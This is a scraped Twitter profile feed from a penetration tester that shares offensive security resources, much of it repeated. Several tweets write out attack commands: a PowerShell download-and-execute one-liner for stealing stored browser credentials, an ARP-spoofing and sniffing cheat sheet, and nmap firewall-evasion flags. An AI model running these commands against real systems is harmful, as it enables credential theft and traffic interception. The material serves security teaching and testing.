Florian Hansemann Profile Banner
Florian Hansemann Profile
Florian Hansemann

@CyberWarship

Followers
74,684
Following
47
Media
8,993
Statuses
17,258

Father, Founder @HanseSecure , Pentesting, Student, ExploitDev, Redteaming, InfoSec & CyberCyber; -- Mastodon:

Munich, Germany
Joined January 2015
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
Pinned Tweet
@CyberWarship
Florian Hansemann
4 years
Meterpreter session 1 opened #infosec #phishing #happyHacking
Tweet media one
39
33
408
@CyberWarship
Florian Hansemann
3 years
Windows Kernel Exploitation Tutorial Part 1: Setup Part 2: Stack Overflow Part 3: Memory Overwrite Part 4: Pool Overflow Part 5: NULL Pointer Dereference
Tweet media one
Tweet media two
Tweet media three
3
637
2K
@CyberWarship
Florian Hansemann
2 years
Windows Kernel Exploitation Tutorial Part 1: Setup Part 2: Stack Overflow Part 3: Memory Overwrite Part 4: Pool Overflow Part 5: NULL Pointer Dereference
Tweet media one
Tweet media two
Tweet media three
10
565
1K
@CyberWarship
Florian Hansemann
4 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
8
429
1K
@CyberWarship
Florian Hansemann
4 years
A post-exploitation powershell tool for extracting juicy info from memory. #infosec #pentest #redteam
Tweet media one
9
436
1K
@CyberWarship
Florian Hansemann
3 years
Blue Team fundamentals Part Two: Windows Processes. #infosec #blueteam #redteam
3
271
1K
@CyberWarship
Florian Hansemann
3 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
6
389
1K
@CyberWarship
Florian Hansemann
2 years
ZDI-21-1053: Bypassing Windows Lock Screen #infosec #pentest #redteam
Tweet media one
Tweet media two
Tweet media three
8
310
1K
@CyberWarship
Florian Hansemann
4 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
10
359
961
@CyberWarship
Florian Hansemann
3 years
Docker for Pentesters - My biggest problem in my job is the limited time. That's why I'm all the more grateful to my friend @ropnop for this great post. Have a look, it's super helpful! #infosec #pentest #bugbounty
5
294
917
@CyberWarship
Florian Hansemann
4 years
Hacking SQL Server Stored Procedures 1: (un)Trustworthy Databases 2: User Impersonation 3: SQL Injection 4: Enumerating Domain Accounts #infosec #pentest #redteam
6
259
896
@CyberWarship
Florian Hansemann
4 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
4
343
896
@CyberWarship
Florian Hansemann
3 years
I Like to Move It: Windows Lateral Movement Part 1 - WMI Event Subscription Part 2 - DCOM Part 3 - DLL Hijacking - thanks for sharing @domchell #infosec #pentest #redteam
2
300
876
@CyberWarship
Florian Hansemann
4 years
Antivirus Evasion with Python - really good read! #infosec #pentest #redteam
4
351
844
@CyberWarship
Florian Hansemann
4 years
The Regex Cheat Sheet  #infosec
Tweet media one
4
316
848
@CyberWarship
Florian Hansemann
4 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
5
370
844
@CyberWarship
Florian Hansemann
4 years
Undetectable C# & C++ Reverse Shells - don't forget, it's just a title ;-) still some good ideas to bypass AVs #infosec #pentest #redteam
4
329
828
@CyberWarship
Florian Hansemann
2 years
Blue Team fundamentals Part Two: Windows Processes. #infosec #blueteam #redteam
9
248
819
@CyberWarship
Florian Hansemann
4 years
Red Teaming Mind Map from The Hacker Playbook 3 - thanks for sharing @lancinimarco #infosec #pentest #redteam
Tweet media one
5
353
802
@CyberWarship
Florian Hansemann
4 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
6
296
791
@CyberWarship
Florian Hansemann
4 years
Antivirus Evasion with Python - really good read! #infosec #pentest #redteam
6
311
784
@CyberWarship
Florian Hansemann
6 years
nmap options/ideas to avoid Firewall fragmentation -f change default MTU --mtu 24 random number of decoys -D RND:10 Change Source port --source-port 80 Append Random Data to Packet --data-length 25 MAC Address Spoofing --spoof-mac Dell/Apple/3Com #infosec #pentest
7
342
789
@CyberWarship
Florian Hansemann
4 years
File upload vulnerability scanner and exploitation tool #infosec #pentest #bugbounty
Tweet media one
1
272
776
@CyberWarship
Florian Hansemann
4 years
Change your MAC Address via Powershell Set-NetAdapter -Name "Ethernet 1" -MacAddress "00-10-18-57-1B-0D" #infosec #pentest
16
221
743
@CyberWarship
Florian Hansemann
5 years
Red Teaming Mind Map from The Hacker Playbook 3 #infosec #pentest #redteam
Tweet media one
4
343
735
@CyberWarship
Florian Hansemann
3 years
Penetration Testing / OSCP Biggest Reference Bank - really huge list #infosec #pentest #OSCP
6
205
715
@CyberWarship
Florian Hansemann
5 years
Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code #infosec #pentest #blueteam #redteam
6
304
717
@CyberWarship
Florian Hansemann
4 years
A Red Teamer's guide to pivoting #infosec #pentest #redteam
Tweet media one
3
266
712
@CyberWarship
Florian Hansemann
4 years
Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code #infosec #pentest #blueteam #redteam
3
294
715
@CyberWarship
Florian Hansemann
3 years
AZURE AD INTRODUCTION FOR RED TEAMERS #infosec #pentest #redteam
Tweet media one
3
201
716
@CyberWarship
Florian Hansemann
5 years
Just 3 Lines of native Powershell to extract stored credentials from Edge && IE Code: Usage: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('')" #infosec #pentest #redteam
12
341
715
@CyberWarship
Florian Hansemann
3 years
I Like to Move It: Windows Lateral Movement Part 1 - WMI Event Subscription Part 2 - DCOM Part 3 - DLL Hijacking - thanks for sharing @domchell #infosec #pentest #redteam
6
271
705
@CyberWarship
Florian Hansemann
4 years
SQL Injection Cheat Sheet - one of the best SQL cheats out there! #infosec #pentest #bugbounty
4
231
699
@CyberWarship
Florian Hansemann
6 years
nmap options/ideas to avoid Firewall fragmentation -f change default MTU --mtu 24 random number of decoys -D RND:10 Change Source port --source-port 80 Append Random Data to Packet --data-length 25 MAC Address Spoofing --spoof-mac Dell/Apple/3Com #infosec #pentest
8
285
694
@CyberWarship
Florian Hansemann
4 years
Windows Privilege Escalation Guide #infosec #pentest #redteam
5
271
673
@CyberWarship
Florian Hansemann
3 years
Top 16 Active Directory Vulnerabilities This article provides practical information on how to pentest Active Directory environments using a list of 16 most common AD vulnerabilities and mis-configurations. #pentest #infosec #redteam
Tweet media one
Tweet media two
Tweet media three
0
232
657
@CyberWarship
Florian Hansemann
5 years
Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code #infosec #pentest #blueteam #redteam
7
263
631
@CyberWarship
Florian Hansemann
6 years
Passing OSCP - really huge command reference for pentesting and the like #infosec #pentest #bugbounty
4
269
626
@CyberWarship
Florian Hansemann
4 years
Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code #infosec #pentest #blueteam #redteam
2
249
628
@CyberWarship
Florian Hansemann
3 years
Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😎 WriteUp Code #infosec #pentest #blueteam #redteam
3
172
612
@CyberWarship
Florian Hansemann
3 years
ZDI-21-1053: Bypassing Windows Lock Screen #infosec #pentest #redteam
Tweet media one
Tweet media two
Tweet media three
9
219
616
@CyberWarship
Florian Hansemann
5 years
Red Teaming Mind Map from The Hacker Playbook 3 - thanks for sharing @lancinimarco #infosec #pentest #redteam
Tweet media one
2
282
614
@CyberWarship
Florian Hansemann
5 years
Windows Privilege Escalation Guide #infosec #pentest #redteam
1
239
601
@CyberWarship
Florian Hansemann
5 years
Simple Webserver with ncat ncat --keep-open -l -p 1337 -c "printf 'HTTP/1.1 200 OK\r\n\r\n'; cat ~/evil.html" What's your way to quickly start a webserver ? 😎 #infosec #pentest
18
188
597
@CyberWarship
Florian Hansemann
4 years
Windows Command Line cheatsheet (part 2): WMIC - Bookmark this! Saved my day several times 😉 #infosec #pentest #redteam
3
209
603
@CyberWarship
Florian Hansemann
4 years
Change your MAC Address via Powershell Set-NetAdapter -Name "Ethernet 1" -MacAddress "00-10-18-57-1B-0D" #infosec
7
199
590
@CyberWarship
Florian Hansemann
4 years
Tweet media one
71
22
595
@CyberWarship
Florian Hansemann
4 years
A Red Teamer's guide to pivoting #infosec #pentest #redteam
Tweet media one
2
208
595
@CyberWarship
Florian Hansemann
4 years
AZURE AD INTRODUCTION FOR RED TEAMERS #infosec #pentest #redteam
Tweet media one
3
208
590
@CyberWarship
Florian Hansemann
3 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
Tweet media one
1
233
588
@CyberWarship
Florian Hansemann
3 years
Just 3 Lines of native Powershell to extract stored credentials from Edge && IE Code: Usage: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('')" #infosec #pentest #redteam
7
151
585
@CyberWarship
Florian Hansemann
3 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
1
217
583
@CyberWarship
Florian Hansemann
3 years
Seeing so many Hacker, Consultant, Security Engineers, Pentester, ... and nobody uses ncat -ssl $IP $Port Instead of nc $IP $Port There is something called encryption, especially while doing remote stuff via the Internet 😒 #infosec #pentest #redteam #hacking
17
124
570
@CyberWarship
Florian Hansemann
4 years
Hacking SQL Server Stored Procedures 1: (un)Trustworthy Databases 2: User Impersonation 3: SQL Injection 4: Enumerating Domain Accounts #infosec #pentest #redteam
3
229
580
@CyberWarship
Florian Hansemann
3 years
Win Brute Logon - local password brute force #infosec #pentest
Tweet media one
8
136
571
@CyberWarship
Florian Hansemann
4 years
Simple tool for searching of default credentials for network devices, web applications and more. Search through 523 vendors and their 2084 default passwords #infosec #pentest
Tweet media one
3
215
565
@CyberWarship
Florian Hansemann
4 years
Blue Team fundamentals Part Two: Windows Processes. #infosec #blueteam #redteam
1
170
562
@CyberWarship
Florian Hansemann
4 years
Red Teaming Mind Map from The Hacker Playbook 3 - thanks for sharing @lancinimarco #infosec #pentest #redteam
Tweet media one
6
209
561
@CyberWarship
Florian Hansemann
2 years
"Did You Know Your Browser’s Autofill Credentials Could Be Stolen via Cross-Site Scripting (XSS)" #infosec #pentest #redteam
Tweet media one
Tweet media two
Tweet media three
Tweet media four
9
177
556
@CyberWarship
Florian Hansemann
11 months
"CS:GO: From Zero to 0-day" #infosec #pentest #redteam
Tweet media one
Tweet media two
5
106
537
@CyberWarship
Florian Hansemann
4 years
Active Directory Assessment and Privilege Escalation Script - thanks for sharing @Haus3c #infosec #pentest #redteam
1
195
545
@CyberWarship
Florian Hansemann
2 years
HOW ATTACKERS ARE BYPASSING POWERSHELL PROTECTIONS #infosec #pentest #redteam #blueteam
Tweet media one
Tweet media two
5
170
534
@CyberWarship
Florian Hansemann
2 years
Make a USB Rubber Ducky with less than $3 #infosec #pentest #redteam
Tweet media one
Tweet media two
Tweet media three
Tweet media four
6
156
526
@CyberWarship
Florian Hansemann
5 years
Windows Privilege Escalation Guide #infosec #pentest #redteam
4
220
534
@CyberWarship
Florian Hansemann
2 years
AD Attack 1) Performing domain recon using PS 2) Attack mapping with bloodhound 3) Extracting passwd hashes 4) Pass-the-hash attacks with mimikatz #infosec #pentest #redteam
Tweet media one
3
211
529
@CyberWarship
Florian Hansemann
4 years
A collection of open source and commercial tools that aid in red team operations. - super useful resource! #infosec #pentest #redteam
Tweet media one
6
191
535
@CyberWarship
Florian Hansemann
4 years
Lateral Movement \ Windows and Active Directory - great content & very well written, thanks for sharing @dottor_morte #infosec #pentest #redteam
3
218
519
@CyberWarship
Florian Hansemann
3 years
I Like to Move It: Windows Lateral Movement Part 1 - WMI Event Subscription Part 2 - DCOM Part 3 - DLL Hijacking - thanks for sharing @domchell #infosec #pentest #redteam
Tweet media one
3
216
522
@CyberWarship
Florian Hansemann
2 years
red-team-scripts: A collection of Red Team focused tools, scripts, and notes #infosec #pentest #redteam
Tweet media one
Tweet media two
3
164
488
@CyberWarship
Florian Hansemann
5 years
SQL Injection Cheat Sheet - super useful one! #infosec #pentest #bugbounty
1
184
477
@CyberWarship
Florian Hansemann
5 years
MitM Copy&Paste Sheet 😎 #forwarding sysctl -w net.ipv4.ip_forward=1 #redirect Traffic arpspoof -i [Interface] -t [tgtIP] [RouterIP] arpspoof -i [Interface] -t [RouterIP] [tgtIP] #sniff pictures driftnet -i [Interface] #sniff URLs urlsnarf -i [Interface] #infosec #pentest
3
193
480
@CyberWarship
Florian Hansemann
4 years
For all Hunters on @hackthebox_eu or the Like: plz safety first via apt-get install ufw ufw default deny incoming ufw enable For Connection from target to you port: ufw allow from $target to any port $port And Now: Hack the Planet! 😎 #infosec #pentest #hacking #CTF
9
151
477
@CyberWarship
Florian Hansemann
1 year
"LinuxForensics: Everything related to Linux Forensics" #pentest #redteam #infosec
Tweet media one
1
151
476
@CyberWarship
Florian Hansemann
5 years
File upload vulnerability scanner and exploitation tool. #infosec #pentest #bugbounty
Tweet media one
2
192
464
@CyberWarship
Florian Hansemann
5 years
Detection Lab Collection of Packer & Vagrant scripts that quickly bring a Windows AD online, complete with a collection of endpoint security tooling & logging best practices 😲 WriteUp Code #infosec #pentest #blueteam #redteam
1
197
472
@CyberWarship
Florian Hansemann
4 years
The Internals of AppLocker Part 1: Overview and Setup Part 2: Blocking Process Creation Part 3: Access Tokens and Access Checking Part 4: Blocking DLL Loading #infosec #blueteam
0
222
475
@CyberWarship
Florian Hansemann
5 years
HackBar plugin for Burpsuite  #infosec #pentest #bugbounty
2
184
463
@CyberWarship
Florian Hansemann
4 years
No Privilege Escalating through standard methods ? whoami /priv If you got one of these == win 😉 SeBackupPrivilege, SeDebugPrivilege, SeTakeOwnershipPrivilege, SeTcbPrivilege, SeCreateToken Privilege, SeLoadDriver Privilege, SeImpersonate #infosec #pentest #redteam
3
139
460
@CyberWarship
Florian Hansemann
2 years
Azure-Red-Team: Azure Security Resources and Notes #infosec #pentest #redteam
Tweet media one
2
164
465
@CyberWarship
Florian Hansemann
5 years
Windows Privilege Escalation Guide #infosec #pentest #redteam
3
221
462